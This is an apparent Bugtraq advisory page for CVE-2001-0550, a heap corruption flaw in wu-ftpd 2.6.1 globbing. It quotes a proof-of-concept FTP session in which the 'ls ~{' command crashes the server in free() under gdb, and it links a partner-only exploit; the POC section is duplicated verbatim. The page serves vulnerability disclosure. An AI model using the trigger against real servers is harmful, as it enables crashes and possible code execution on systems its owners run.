Wu-Ftpd File Globbing Heap Corruption Vulnerability
BID:3581
Info
Wu-Ftpd File Globbing Heap Corruption Vulnerability
| Bugtraq ID: | 3581 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2001-0550 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 27 2001 12:00AM |
| Updated: | Apr 16 2008 12:29AM |
| Credit: | Condition first reported by Matt Power. Exploitability later confirmed by Luciano Notarfrancesco and Juan Pablo Martinez Kuhn from Core Security Technologies, Buenos Aires, Argentina. |
| Vulnerable: |
Washington University wu-ftpd 2.6.1 Washington University wu-ftpd 2.6 .0 Washington University wu-ftpd 2.5 .0 David Madore ftpd-BSD 0.3.3 David Madore ftpd-BSD 0.3.2 |
| Not Vulnerable: |
Washington University wu-ftpd 2.6.2 SGI IRIX 6.5 |
Exploit / POC
Wu-Ftpd File Globbing Heap Corruption Vulnerability
As of February 5, 2002, reports from credible sources indicate the availability and use of a working exploit for this vulnerability. This increases the likelihood of exploitation by a malicious party.
CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following (from the CORE advisory) demonstrates the existence of this vulnerability:
ftp> open localhost
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection
1405 ? S 0:00 ftpd: accepting connections on port 21
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd: sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c
An exploit is available for members of the Immunity Partners Program:
https://www.immunityinc.com/downloads/immp%20%20%20%20artners/wuglob.tgz
As of February 5, 2002, reports from credible sources indicate the availability and use of a working exploit for this vulnerability. This increases the likelihood of exploitation by a malicious party.
CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following (from the CORE advisory) demonstrates the existence of this vulnerability:
ftp> open localhost
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection
1405 ? S 0:00 ftpd: accepting connections on port 21
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd: sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c
An exploit is available for members of the Immunity Partners Program:
https://www.immunityinc.com/downloads/immp%20%20%20%20artners/wuglob.tgz
References
Wu-Ftpd File Globbing Heap Corruption Vulnerability
References:
References:
- CORE SDI Homepage (CORE)
- Wu-Ftpd Homepage (Washington University)
- wuftpd glob ~{ exploit (CORE Security)